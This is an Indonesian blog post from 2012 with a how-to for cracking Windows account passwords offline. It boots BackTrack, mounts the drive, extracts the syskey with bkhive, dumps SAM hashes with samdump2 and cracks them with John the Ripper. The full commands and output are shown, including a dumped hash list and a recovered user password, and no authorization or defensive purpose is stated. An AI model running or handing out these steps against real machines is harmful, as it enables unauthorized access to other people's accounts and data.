Saturday, March 3, 2012

Cracking Password Windows

Sistem operasi windows menyimpan file passwordnya pada /WINDOWS/system32/config/SAM yang enkripsi sehingga cracker tidak bisa membaca isi filenya, akan tetapi faktanya adalah sia-sia karena proteksi ini berhasil ditembus. Sehingga Microsoft menambahkan satu tahap proteksi untuk melakukan pengacakan pada file SAM semenjak sistem operasi NT SP 3 yang dinamakan syskey (SYStem KEY) yang baru dipakai pada Windows XP dan 2003.
Sehingga kegiatan Cracking Menjadi sulit karena harus mendapatkan nilai syskey sebelumnya untuk melakukan cracking pada password Windows. Disini kita kan manggunakan bkhive untuk untuk mendapatkan syskey dan Samdump untuk mendapatkan hash dari file SAM. Terakhir file hash kita akan crack menggunakan John The Ripper.

1. Booting DVD Backtrack dan mount drive C pada windows

root@root:~# fdisk -l

Disk /dev/sda: 10.7 GB, 10737418240 bytes
255 heads, 63 sectors/track, 1305 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0xf9c9f9c9

   Device Boot      Start         End      Blocks   Id  System
/dev/sda1   *           1        1304    10474348+   7  HPFS/NTFS
root@root:~# mkdir /mnt/sda1
root@root:~# mount -t ntfs /dev/sda1 /mnt/sda1 -o force

2. Ambil key dari system menggunakan bkhive simpan menjadi key.txt

root@root:~# cd /mnt/sda1/WINDOWS/system32/config/
root@root:/mnt/sda1/WINDOWS/system32/config# bkhive system ~/Desktop/key.txt
bkhive 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it

Root Key : $$$PROTO.HIV
Default ControlSet: 001
Bootkey: e5ff38114c42c939dd424d743c2449de



3. Gunakan samdump2 untuk mendapatkan hash dari file SAM dan key.txt simpan menjadi hash.txt

root@root:/mnt/sda1/WINDOWS/system32/config# samdump2 SAM ~/Desktop/key.txt > ~/Desktop/hash.txt
samdump2 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it

Root Key : SAM
root@root:/mnt/sda1/WINDOWS/system32/config# cat ~/Desktop/hash.txt 
Administrator:500:ad14d8a198d59425aad3b435b51404ee:3b8c3f78f6234c65f1546c64d2f60c02:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:c777e627a172ac2746aa5c01317bb49b:c89f1c86ea7236bf367851f3c58797be:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:c5b7293e8c3265d42977595b48810830:::
octopurba:1003:a17aad0ec01bbbe934a157cfdb7ad51f:b5034028f7b2ae3cf9e93b1181a39f2e:::



4. Crack file dari hash.txt menggunakan John The Ripper

root@root:/mnt/sda1/WINDOWS/system32/config# cd /pentest/passwords/john/
root@root:/pentest/passwords/john# ./john ~/Desktop/hash.txt 
Loaded 7 password hashes with no different salts (LM DES [128/128 BS SSE2])
GILAKOM          (octopurba:1)
                          (SUPPORT_388945a0)
                          (Guest)
PUTER              (octopurba:2)



diatas kita bisa melihat bahwa password adalah "gilakomputer" untuk user "octopurba".

kontraktor acp

Author & Editor

Has laoreet percipitur ad. Vide interesset in mei, no his legimus verterem. Et nostrum imperdiet appellantur usu, mnesarchum referrentur id vim.

1 comments:

  1. ane da coba, tapi kok yang muncul Error opening hive file system,,,waduuuhhh ane jadi bingung niee dan... ~x(

    ReplyDelete

Silahkan meninggalkan pesan jika artikel diatas membantu anda,:)

 
biz.